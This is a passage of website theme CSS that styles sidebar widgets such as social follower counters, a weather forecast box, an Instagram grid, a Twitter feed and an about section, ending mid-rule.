.textwidget p { margin-bottom: 1rem; } .sidebar-inner { top: 0; } .sidebar-inner .widget { overflow: inherit; } .widget-heading.h4:after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; -webkit-transform: skewX(-15deg); transform: skewX(-15deg); border-right: 3px solid var(--heading-sub-color); border-left: 3px solid var(--heading-sub-color); } .widget-heading.h4 { line-height: 1.1; position: relative; display: inline-block; padding: 0 15px; } .social-follower { display: flex; display: -webkit-flex; flex-wrap: wrap; } .follower-el { position: relative; } .is-style-15 .social-follower, .is-style-14 .social-follower, .is-style-8 .social-follower, .is-style-7 .social-follower, .is-style-6 .social-follower, .is-style-5 .social-follower, .is-style-4 .social-follower, .is-style-3 { margin: -5px; } .is-style-9 .social-follower, .is-style-2 .social-follower, .is-style-1 { margin: -10px; } .fncount-wrap:not(.is-style-10):not(.is-style-11):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el { position: relative; flex: 0 0 25%; max-width: 25%; } .is-style-15 .follower-el, .is-style-14 .follower-el, .is-style-13 .follower-el, .is-style-12 .follower-el, .is-style-8 .follower-el, .is-style-7 .follower-el, .is-style-6 .follower-el, .is-style-5 .follower-el, .is-style-4 .follower-el, .is-style-3 .follower-el { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); } .fncount-wrap.is-style-14 .follower-el, .fncount-wrap.is-style-15 .follower-el { position: relative; flex: 0 0 50%; max-width: 50%; } .is-style-10 .follower-el, .is-style-11 .follower-el { flex: 0 0 100%; flex-grow: 1; max-width: 100%; margin-bottom: 15px; } .is-style-12 .follower-el, .is-style-13 .follower-el { flex: 0 0 100%; flex-grow: 1; max-width: 100%; margin-bottom: 10px; } .is-style-10 .fnicon, .is-style-11 .fnicon { margin-right: 8px; } .is-style-12 .fnicon, .is-style-13 .fnicon { font-size: 1.25em; margin-right: 8px; } .is-style-10 .fntotal, .is-style-11 .fntotal, .is-style-12 .fntotal, .is-style-13 .fntotal, .is-style-14 .fntotal, .is-style-15 .fntotal, .is-style-10 .fnlabel, .is-style-11 .fnlabel, .is-style-12 .fnlabel, .is-style-13 .fnlabel, .is-style-14 .fnlabel, .is-style-15 .fnlabel { margin-top: 0; margin-left: 3px; } .is-style-10 .fntotal + .fnlabel, .is-style-11 .fntotal + .fnlabel, .is-style-12 .fntotal + .fnlabel, .is-style-13 .fntotal + .fnlabel { font-size: .7em; margin-top: -4px; } .is-style-10 .follower-el:last-child, .is-style-11 .follower-el:last-child, .is-style-12 .follower-el:last-child, .is-style-13 .follower-el:last-child { margin-bottom: 0; } .effect-fadeout.activated .follower-el { opacity: .3; } .effect-fadeout.activated .follower-el:hover, .effect-fadeout.activated .follower-el:focus { opacity: 1; } .follower-el a { position: absolute; z-index: 99; top: 0; left: 0; width: 100%; height: 100%; } .follower-inner { font-size: 1rem; display: flex; align-items: center; flex: 1; flex-direction: column; } .is-style-9 .follower-inner, .is-style-2 .follower-inner, .is-style-1 .follower-inner { margin: 10px; } .is-style-10 .follower-inner, .is-style-11 .follower-inner, .is-style-12 .follower-inner, .is-style-13 .follower-inner { align-items: center; flex-flow: row nowrap; } .is-style-12 .follower-inner, .is-style-13 .follower-inner { position: relative; overflow: hidden; padding: 10px 20px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .is-style-12 .follower-inner { border: 1px solid var(--flex-gray-15); } .is-style-14 .follower-inner, .is-style-15 .follower-inner { display: grid; margin: 5px; padding: 12px 7px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); grid-template-columns: 42px auto 1fr; grid-gap: 0; } .fntotal, .fnlabel { line-height: 1.3; margin-top: 7px; white-space: nowrap; } .text-count { font-family: var(--meta-family); font-size: var(--em-small); font-weight: var(--meta-fweight); line-height: 1.5; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; letter-spacing: var(--meta-fspace); color: var(--meta-fcolor); } .fnicon { font-size: 1.75em; line-height: 1; } .fnicon i { font-size: inherit; line-height: 1; text-shadow: 3px 3px 0 #ffffff10, 4px 2px 0 #00000020; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-9 .fnicon i, .is-style-10 .fnicon i, .is-style-11 .fnicon i { position: relative; display: flex; align-items: center; justify-content: center; -webkit-transition: var(--effect); transition: var(--effect); } .light-scheme .follower-el:not(:hover) .is-style-2 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-2 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-3 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-3 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-6 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-6 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-7 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-7 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-9 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-9 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-10 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-10 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-12 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-12 .fnicon i, .light-scheme .follower-el:not(:hover) .is-style-15 .fnicon i, [data-theme='dark'] .follower-el:not(:hover) .is-style-15 .fnicon i { text-shadow: 3px 3px 0 #ffffff10, 4px 2px 0 #ffffff20; } .is-style-10 .fnicon i, .is-style-11 .fnicon i { position: relative; width: 48px; height: 48px; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-10 .fnicon i, .is-style-11 .fnicon i { -webkit-border-radius: 50%; border-radius: 50%; } .is-style-1 .fnicon i, .is-style-11 .fnicon i { color: #fff; } .is-style-1 .fnicon i, .is-style-2 .fnicon i, .is-style-9 .fnicon i { width: 58px; height: 58px; } .is-style-9 .follower-el:not(:hover) i:after { position: absolute; z-index: 9; top: 0; left: 0; width: 100%; height: 100%; content: ''; opacity: .15; border: 5px solid var(--g-color); } .is-style-9 .follower-el:not(:hover) i:after, .is-style-9 .follower-el i { -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .is-style-12 .text-count, .is-style-13 .text-count { margin-left: auto; } .is-style-12 .follower-inner > :nth-child(2), .is-style-13 .follower-inner > :nth-child(2) { position: relative; margin-top: 0; padding-left: 10px; } .is-style-12 .follower-inner > :nth-child(2):before, .is-style-13 .follower-inner > :nth-child(2):before { position: absolute; top: 50%; left: 0; width: 1px; height: 12px; margin-top: -6px; content: ''; } .is-style-12 .fntotal:before, .is-style-12 .fnlabel:before { background-color: var(--flex-gray-15); } .is-style-13 .fntotal:before, .is-style-13 .fnlabel:before { background-color: rgba(255, 255, 255, .5); } .is-style-14 .follower-inner, .is-style-15 .follower-inner { font-size: .9em; } .is-style-14 .fnicon, .is-style-15 .fnicon { height: 100%; text-align: center; grid-row: 1 / 3; } .is-style-14 .text-count, .is-style-15 .text-count { line-height: 1; margin-top: 7px; margin-left: 4px; grid-column: 2 / span 3; grid-row: 2; } .is-style-14 .fnicon i, .is-style-15 .fnicon i { display: flex; align-items: center; justify-content: center; height: 100%; justify-items: center; } .is-style-10 .text-count, .is-style-11 .text-count { margin-top: 0; margin-left: auto; -webkit-transition: var(--effect); transition: var(--effect); } .is-style-1 .fnicon, .is-style-2 .fnicon, .is-style-9 .fnicon, .is-style-10 .fnicon, .is-style-11 .fnicon { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); } .is-style-8 .follower-inner, .is-style-7 .follower-inner, .is-style-6 .follower-inner, .is-style-5 .follower-inner, .is-style-4 .follower-inner, .is-style-3 .follower-inner { margin: 5px; padding: 15px; -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .is-style-7 .follower-el .follower-inner, .is-style-4 .follower-inner { -webkit-box-shadow: 0 0 10px var(--shadow-7); box-shadow: 0 0 10px var(--shadow-7); } .is-style-14 .follower-inner > *, .is-style-13 .follower-inner > *, .is-style-8 .follower-inner > *, .is-style-5 .follower-inner > * { color: #fff; } .is-style-15 .follower-inner, .is-style-6 .follower-inner, .is-style-3 .follower-inner, .is-style-2 .fnicon i, .is-style-10 .fnicon i { border: 1px solid var(--flex-gray-15); } .is-style-8 .follower-el .text-count, .is-style-7 .follower-el .text-count, .is-style-6 .follower-el .text-count { display: none; } .is-style-14 .bg-facebook .follower-inner, .is-style-13 .bg-facebook .follower-inner, .is-style-11 .bg-facebook i, .is-style-8 .bg-facebook .follower-inner, .is-style-5 .bg-facebook .follower-inner, .is-style-1 .rbi-facebook { background-color: #89abfc; } .is-style-14 .bg-twitter .follower-inner, .is-style-13 .bg-twitter .follower-inner, .is-style-11 .bg-twitter i, .is-style-8 .bg-twitter .follower-inner, .is-style-5 .bg-twitter .follower-inner, .is-style-1 .rbi-twitter { background-color: #60d2f5; } .is-style-14 .bg-pinterest .follower-inner, .is-style-13 .bg-pinterest .follower-inner, .is-style-11 .bg-pinterest i, .is-style-8 .bg-pinterest .follower-inner, .is-style-5 .bg-pinterest .follower-inner, .is-style-1 .rbi-pinterest { background-color: #f74c53; } .is-style-14 .bg-instagram .follower-inner, .is-style-13 .bg-instagram .follower-inner, .is-style-11 .bg-instagram i, .is-style-8 .bg-instagram .follower-inner, .is-style-5 .bg-instagram .follower-inner, .is-style-1 .rbi-instagram { background-color: #7e40b6; } .is-style-14 .bg-youtube .follower-inner, .is-style-13 .bg-youtube .follower-inner, .is-style-11 .bg-youtube i, .is-style-8 .bg-youtube .follower-inner, .is-style-5 .bg-youtube .follower-inner, .is-style-1 .rbi-youtube { background-color: #ef464b; } .is-style-14 .bg-telegram .follower-inner, .is-style-13 .bg-telegram .follower-inner, .is-style-11 .bg-telegram i, .is-style-8 .bg-telegram .follower-inner, .is-style-5 .bg-telegram .follower-inner, .is-style-1 .rbi-telegram { background-color: #89abfc; } .is-style-14 .bg-vimeo .follower-inner, .is-style-13 .bg-vimeo .follower-inner, .is-style-11 .bg-vimeo i, .is-style-8 .bg-vimeo .follower-inner, .is-style-5 .bg-vimeo .follower-inner, .is-style-1 .rbi-vimeo { background-color: #44bbe1; } .is-style-14 .bg-dribbble .follower-inner, .is-style-13 .bg-dribbble .follower-inner, .is-style-11 .bg-dribbble i, .is-style-8 .bg-dribbble .follower-inner, .is-style-5 .bg-dribbble .follower-inner, .is-style-1 .rbi-dribbble { background-color: #fb70a6; } .is-style-14 .bg-soundcloud .follower-inner, .is-style-13 .bg-soundcloud .follower-inner, .is-style-11 .bg-soundcloud i, .is-style-8 .bg-soundcloud .follower-inner, .is-style-5 .bg-soundcloud .follower-inner, .is-style-1 .rbi-soundcloud { background-color: #fd794a; } .is-style-15 .rbi-facebook, .is-style-12 .rbi-facebook, .is-style-10 .rbi-facebook, .is-style-9 .rbi-facebook, .is-style-7 .rbi-facebook, .is-style-6 .rbi-facebook, .is-style-4 .rbi-facebook, .is-style-3 .rbi-facebook, .is-style-2 .rbi-facebook { color: #89abfc; } .is-style-15 .rbi-twitter, .is-style-12 .rbi-twitter, .is-style-10 .rbi-twitter, .is-style-9 .rbi-twitter, .is-style-7 .rbi-twitter, .is-style-6 .rbi-twitter, .is-style-4 .rbi-twitter, .is-style-3 .rbi-twitter, .is-style-2 .rbi-twitter { color: #60d2f5; } .is-style-15 .rbi-pinterest, .is-style-12 .rbi-pinterest, .is-style-10 .rbi-pinterest, .is-style-9 .rbi-pinterest, .is-style-7 .rbi-pinterest, .is-style-6 .rbi-pinterest, .is-style-4 .rbi-pinterest, .is-style-3 .rbi-pinterest, .is-style-2 .rbi-pinterest { color: #f74c53; } .is-style-15 .rbi-instagram, .is-style-12 .rbi-instagram, .is-style-10 .rbi-instagram, .is-style-9 .rbi-instagram, .is-style-7 .rbi-instagram, .is-style-6 .rbi-instagram, .is-style-4 .rbi-instagram, .is-style-3 .rbi-instagram, .is-style-2 .rbi-instagram { color: #7e40b6; } .is-style-15 .rbi-youtube, .is-style-12 .rbi-youtube, .is-style-10 .rbi-youtube, .is-style-9 .rbi-youtube, .is-style-7 .rbi-youtube, .is-style-6 .rbi-youtube, .is-style-4 .rbi-youtube, .is-style-3 .rbi-youtube, .is-style-2 .rbi-youtube { color: #ef464b; } .is-style-15 .rbi-telegram, .is-style-12 .rbi-telegram, .is-style-10 .rbi-telegram, .is-style-9 .rbi-telegram, .is-style-7 .rbi-telegram, .is-style-6 .rbi-telegram, .is-style-4 .rbi-telegram, .is-style-3 .rbi-telegram, .is-style-2 .rbi-telegram { color: #89abfc; } .is-style-15 .rbi-vimeo, .is-style-12 .rbi-vimeo, .is-style-10 .rbi-vimeo, .is-style-9 .rbi-vimeo, .is-style-7 .rbi-vimeo, .is-style-6 .rbi-vimeo, .is-style-4 .rbi-vimeo, .is-style-3 .rbi-vimeo, .is-style-2 .rbi-vimeo { color: #44bbe1; } .is-style-15 .rbi-dribbble, .is-style-12 .rbi-dribbble, .is-style-10 .rbi-dribbble, .is-style-9 .rbi-dribbble, .is-style-7 .rbi-dribbble, .is-style-6 .rbi-dribbble, .is-style-4 .rbi-dribbble, .is-style-3 .rbi-dribbble, .is-style-2 .rbi-dribbble { color: #fb70a6; } .is-style-15 .rbi-soundcloud, .is-style-12 .rbi-soundcloud, .is-style-10 .rbi-soundcloud, .is-style-9 .rbi-soundcloud, .is-style-7 .rbi-soundcloud, .is-style-6 .rbi-soundcloud, .is-style-4 .rbi-soundcloud, .is-style-3 .rbi-soundcloud, .is-style-2 .rbi-soundcloud { color: #fd794a; } .is-style-1 .follower-el:hover .fnicon, .is-style-2 .follower-el:hover .fnicon, .is-style-9 .follower-el:hover .fnicon, .is-style-10 .follower-el:hover .fnicon, .is-style-11 .follower-el:hover .fnicon { -webkit-transform: translate3d(0, -5px, 0); transform: translate3d(0, -5px, 0); } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-facebook:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-facebook { color: #fff; border-color: #1f82ec; background-color: #1f82ec; box-shadow: 0 5px 15px #1f82ec; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-twitter:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-twitter { color: #fff; border-color: #13b9ee; background-color: #13b9ee; box-shadow: 0 5px 15px #13b9ee; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-pinterest:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-pinterest { color: #fff; border-color: #f60c19; background-color: #f60c19; box-shadow: 0 5px 15px #f60c19; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-instagram:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-instagram { color: #fff; border-color: #8823b6; background-color: #8823b6; box-shadow: 0 5px 15px #8823b6; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-youtube:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-youtube { color: #fff; border-color: #fc161e; background-color: #fc161e; box-shadow: 0 5px 15px #fc161e; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-soundcloud:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-soundcloud { color: #fff; border-color: #ff5313; background-color: #ff5313; box-shadow: 0 5px 15px #ff5313; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-telegram:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-telegram { color: #fff; border-color: #3885d9; background-color: #3885d9; box-shadow: 0 5px 15px #3885d9; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-vimeo:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-vimeo { color: #fff; border-color: #16b1e3; background-color: #16b1e3; box-shadow: 0 5px 15px #16b1e3; } .fncount-wrap:not(.is-style-1):not(.is-style-2):not(.is-style-9):not(.is-style-10):not(.is-style-11) .follower-el.bg-dribbble:hover .follower-inner, .fncount-wrap:not(.is-style-3):not(.is-style-4):not(.is-style-5):not(.is-style-6):not(.is-style-7):not(.is-style-8):not(.is-style-12):not(.is-style-13):not(.is-style-14):not(.is-style-15) .follower-el:hover i.rbi-dribbble { color: #fff; border-color: #ff407f; background-color: #ff407f; box-shadow: 0 5px 15px #ff407f; } .is-style-15 .follower-el:hover, .is-style-14 .follower-el:hover, .is-style-13 .follower-el:hover, .is-style-12 .follower-el:hover, .is-style-8 .follower-el:hover, .is-style-7 .follower-el:hover, .is-style-6 .follower-el:hover, .is-style-5 .follower-el:hover, .is-style-4 .follower-el:hover, .is-style-3 .follower-el:hover { -webkit-transform: translate3d(0, -3px, 0); transform: translate3d(0, -3px, 0); } .is-style-15 .follower-el:hover i, .is-style-15 .follower-el:hover .text-count, .is-style-12 .follower-el:hover i, .is-style-12 .follower-el:hover .text-count, .is-style-7 .follower-el:hover i, .is-style-7 .follower-el:hover .text-count, .is-style-6 .follower-el:hover i, .is-style-6 .follower-el:hover .text-count, .is-style-4 .follower-el:hover i, .is-style-4 .follower-el:hover .text-count, .is-style-3 .follower-el:hover i, .is-style-3 .follower-el:hover .text-count { color: #fff; } .is-style-12 .follower-el:hover .fntotal:before, .is-style-12 .follower-el:hover .fnlabel:before { background-color: rgba(255, 255, 255, .5); -webkit-backface-visibility: hidden; backface-visibility: hidden; } .rb-weather-wrap { padding: 20px; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .rb-w-title.h4 { line-height: 1.1; display: inline-block; width: auto; margin-bottom: 15px; padding: 4px 20px; color: #fff; -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background: var(--g-color); } .rb-w-stats { display: flex; display: -webkit-flex; align-items: flex-start; flex: 0 0 100%; flex-flow: row nowrap; flex-basis: 100%; width: 100%; max-width: 100%; margin-top: 10px; margin-bottom: 25px; } .rb-w-stats > *, .rb-w-header > * { width: 50%; } .rb-w-stats .col-left { position: relative; height: 100%; text-align: center; } .rb-w-header .rb-w-big-icon { display: flex; display: -webkit-flex; justify-content: center; } .rb-w-header { display: flex; display: -webkit-flex; align-items: center; flex: 0 0 100%; flex-flow: row nowrap; flex-basis: 100%; width: 100%; max-width: 100%; } .rb-header-name.h6 { font-size: 2rem; line-height: 1; overflow: hidden; white-space: nowrap; letter-spacing: .03rem; text-overflow: ellipsis; } .rb-w-desc { font-size: .84rem; margin-top: 5px; letter-spacing: .03rem; text-transform: capitalize; color: #aaa; } .rb-w-stats > *, .rb-w-header > * { padding: 0 6px; } .rb-w-stats .col-right > * { font-size: .86rem; line-height: 1; display: grid; max-width: 100%; margin-top: 3px; grid-template-columns: auto auto auto auto 1fr; grid-gap: 0; } .rb-w-big-icon svg { width: 86px; height: 86px; } .rb-w-stats .col-right .rb-weather-highlow > :nth-child(3) { margin-right: 3px; margin-left: 10px; text-align: center; } .rb-weather-highlow sup { top: -.3em; } .rb-w-header .col-right .rb-w-units { font-size: 4rem; font-weight: 700; line-height: 1; } .rb-w-units .icon-thermometer { position: absolute; top: -14px; left: -28px; } .rb-weather-highlow svg { display: flex; width: 21px; } .rb-weather-highlow > *:not(:first-child), .rb-w-humidity > *:not(:first-child), .ruby-weather-wind > *:not(:first-child) { display: flex; align-items: center; } .rb-weather-highlow > :nth-child(4) { margin-left: 0; } span.ruby-degrees > :first-child { font-size: 18px; line-height: 1; position: absolute; top: 14px; left: 4px; height: 22px; vertical-align: text-top; } span.ruby-degrees { position: relative; height: 100%; padding-left: 13px; } .w-forecast-wrap { display: flex; display: -webkit-flex; overflow: hidden; flex-flow: row nowrap; justify-content: space-between; max-width: 100%; margin-right: auto; margin-left: auto; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .w-forecast-wrap svg:not(.svg-cloudy):not(.svg-day-cloudy):not(.svg-night-cloudy) g path { stroke: #bbb; fill: #bbb; } .w-forecast-wrap svg.svg-icon.svg-day-cloudy g:nth-child(2) path { stroke: #bbb; fill: #bbb; } .w-forecast-day.h6 { font-size: .7rem; line-height: 18px; display: inline-block; width: 100%; white-space: nowrap; letter-spacing: .03rem; color: #fff; -webkit-border-radius: var(--round-3); border-radius: var(--round-3); background-color: var(--flex-gray-20); } .w-forecast-day { padding: 0 4px; text-align: center; } .w-forecast-icon { display: flex; display: -webkit-flex; justify-content: center; } .w-forecast-icon svg { width: 40px; height: 40px; margin-bottom: -3px; } .w-forecast-icon svg.svg-day-sunny { padding: 4px; } .w-forecast-temp { font-size: var(--rem-small); font-weight: 600; line-height: 1; position: relative; display: inline-flex; } .w-forecast-temp sup { font-size: 62%; position: absolute; top: auto; bottom: 94%; left: 100%; } .forecast-day-1 { flex: 0 0 100%; width: 100%; } .forecast-day-2 { flex: 0 0 50%; width: 50%; } .forecast-day-3 { flex: 0 0 33.33%; width: 33.33%; } .forecast-day-4 { flex: 0 0 25%; width: 25%; } .forecast-day-5 { flex: 0 0 20%; width: 20%; } .top-footer-inner .instagram-grid.is-wide { margin-right: -20px; margin-left: -20px; } .instagram-grid.is-wide { padding: 10px; } .grid-el { overflow: hidden; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); justify-self: stretch; } .grid-header { font-size: 1.25rem; display: block; margin-bottom: 20px; text-align: center; } .w-fw-footer.widget-instagram .rb-error { margin-bottom: 20px; text-align: center; } .instagram-box a { position: absolute; z-index: 1; top: 0; right: 0; bottom: 0; left: 0; display: block; } .instagram-box { position: relative; overflow: hidden; flex: 1; height: 100%; padding-bottom: 100%; } .instagram-box img, .instagram-box video { position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-fit: cover; -webkit-object-fit: cover; object-position: 50% 50%; } .box-intro { line-height: 1; height: 0; -webkit-transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); } .box-intro:hover { opacity: .7; } .intro-inner { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: flex; align-items: center; flex-flow: column nowrap; justify-content: center; width: 100%; text-align: center; border: 1px solid var(--flex-gray-15); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .intro-content { font-size: var(--rem-mini); font-style: italic; line-height: 1.5; display: block; margin-top: 7px; padding: 0 10px; color: inherit; } .intro-inner i { font-size: 2.2rem; display: block; } .grid-el .box-content { position: absolute; z-index: 2; top: 0; right: 0; bottom: 0; left: 0; display: flex; display: -webkit-flex; align-items: center; justify-content: center; -webkit-transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); transition: all .3s cubic-bezier(0.32, 0.74, 0.57, 1); pointer-events: none; opacity: 0; color: #fff; } .instagram-box .box-content span { line-height: 1; z-index: 10; display: inline-flex; display: -webkit-inline-flex; align-items: center; padding: 0 5px; color: #fff; } .instagram-box .box-content i { font-size: 1.1rem; line-height: 1; margin-right: 3px; color: #fff; } .instagram-box:hover .box-content { opacity: 1; } .instagram-box .box-content:before { position: absolute; top: 0; left: 0; width: 100%; height: 100%; content: ''; background-color: rgba(0, 0, 0, .5); } .rb-twitter-wrap { padding: 20px; border: 1px solid var(--flex-gray-15); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .rb-twitter-wrap .rb-twitter-text { font-weight: 400; -webkit-transition: var(--effect); transition: var(--effect); color: var(--excerpt-color); } .rb-twitter-wrap a { -webkit-transition: var(--effect); transition: var(--effect); } .rb-twitter-wrap a:hover { color: var(--g-color); } .rb-twitter-wrap a:hover .rb-twitter-text { color: inherit; } .rb-twitter-wrap .rb-tweet-header .rb-twitter-h-info { position: relative; display: grid; margin-bottom: 20px; padding-bottom: 30px; border-bottom: 1px solid var(--flex-gray-15); grid-template-columns: 60px 1fr; grid-template-rows: 22px 22px; grid-column-gap: 5px; grid-row-gap: 1px; } .rb-twitter-wrap .rb-tweet-header { position: relative; } .rb-twitter-wrap .pk-twitter-counters.pk-color-secondary { position: relative; display: grid; grid-template-columns: auto 1fr; grid-gap: 10px; } .rb-twitter-wrap .tweet-avatar { height: 100%; text-align: center; grid-row: 1 / 3; } .rb-twitter-wrap .tweet-avatar img { -webkit-transition: var(--effect); transition: var(--effect); -webkit-border-radius: 50%; border-radius: 50%; } .rb-twitter-wrap .tweet-avatar:hover img { opacity: .9; } .rb-twitter-wrap .tweet-info.h6 { font-size: 1rem; } .rb-twitter-wrap .tweet-info.h6 span:nth-child(2) { text-transform: capitalize; } .rb-twitter-wrap .rb-quoted-author { display: grid; margin-bottom: 3px; grid-template-columns: auto 1fr; grid-gap: 1px; } .rb-twitter-wrap .rb-quoted-author img { -webkit-border-radius: 50%; border-radius: 50%; } .rb-twitter-wrap .rb-quoted-author em { font-weight: 400; font-style: italic; line-height: 24px; margin-bottom: 5px; margin-left: 5px; color: var(--meta-fcolor); } .rb-twitter-wrap .rb-quoted-author { display: grid; grid-template-columns: auto 1fr; grid-gap: 1px; } .rb-quoted-author img { -webkit-border-radius: 50%; border-radius: 50%; } .rb-twitter-wrap .rb-tweet-entry { font-size: var(--excerpt-fsize); color: var(--meta-fcolor); } .rb-twitter-wrap .rb-tweet-entry a { font-family: var(--h6-family); text-decoration: underline; } .rb-twitter-wrap .rb-twitter-summary:not(:last-child) { margin-bottom: 20px; } .rb-twitter-wrap .rb-tweet-actions svg { width: 10px; height: 10px; } .rb-twitter-wrap .rb-tweet-actions a { font-size: .7rem; display: flex; align-items: center; justify-content: center; min-width: 50px; padding: 3px 6px; border: 1px solid var(--flex-gray-15); -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .rb-twitter-wrap .rb-tweet-actions a:not(:last-child) { margin-right: 10px; } .rb-twitter-wrap .rb-tweet-actions .rb-action-count { margin-left: 3px; } .rb-twitter-wrap .rb-tweet-actions { display: flex; align-items: stretch; margin-top: 14px; } .about-content-wrap .about-bio.is-centered { margin-right: auto; margin-left: auto; text-align: center; } .about-content-wrap .social-icon-wrap { display: flex; display: -webkit-flex; flex-flow: row wrap; } .about-bio.is-centered + .social-icon-wrap { justify-content: center; } .about-content-wrap .social-icon-wrap a { margin-right: 15px; -webkit-transition: var(--effect); transition: var(--effect); } .about-content-wrap .social-icon-wrap a:hover { -webkit-transform: scale(1.2); transform: scale(1.2); } .about-content-wrap .about-bio.is-centered + .social-icon-wrap a { margin-right: 0; padding-right: 7px; padding-left: 7px; } .about-content-wrap .about-bio > * { margin-bottom: .5rem; } .about-content-wrap .about-bio > img { margin-bottom: 1.5rem; } .about-content-wrap .about-bio > a img { margin-bottom: 1rem; } .about-content-wrap .about-bio { max-width: 370px; } .about-content-wrap .about-bio p { font-size: var(--rem-mini); line-height: 1.7; max-width: 370px; color: var(--excerpt-color); } .about-content-wrap > *:not(:last-child) { margin-bottom: 15px; } .about-content-wrap .about-bio.is-centered p { margin-right: auto; margin-left: auto; } .grid-holder.rb-c2 { display: grid; grid-template-columns: auto auto; grid-gap: 10px; } .grid-holder.rb-c3 { display: grid; grid-template-columns: auto auto auto; grid-gap: 10px; } .grid-holder.rb-c4 { display: grid; grid-template-columns: auto auto auto auto; grid-gap: 5px; } .grid-el img { height: 100%; } .grid-footer { font-size: .8rem; display: block; margin-top: 10px; text-align: right; } .grid-header span, .grid-header em { font-size: .9rem; } .grid-header a, .grid-footer a { -webkit-transition: opacity .3s cubic-bezier(0.32, 0.74, 0.57, 1); transition: opacity .3s cubic-bezier(0.32, 0.74, 0.57, 1); opacity: .7; } .grid-header a:hover, .grid-footer a:hover { opacity: 1; } .address-info { font-size: var(--rem-small); } .address-info svg { max-width: 16px; height: auto; margin-right: 10px; fill: var(--g-color); } .address-info h5 { margin-bottom: 15px; } .address-info .phone, .address-info .tel, .address-info .email { display: flex; align-items: center; margin-bottom: 10px; } .office-address { display: flex; align-items: flex-start; margin-bottom: 25px; } .office-address svg { 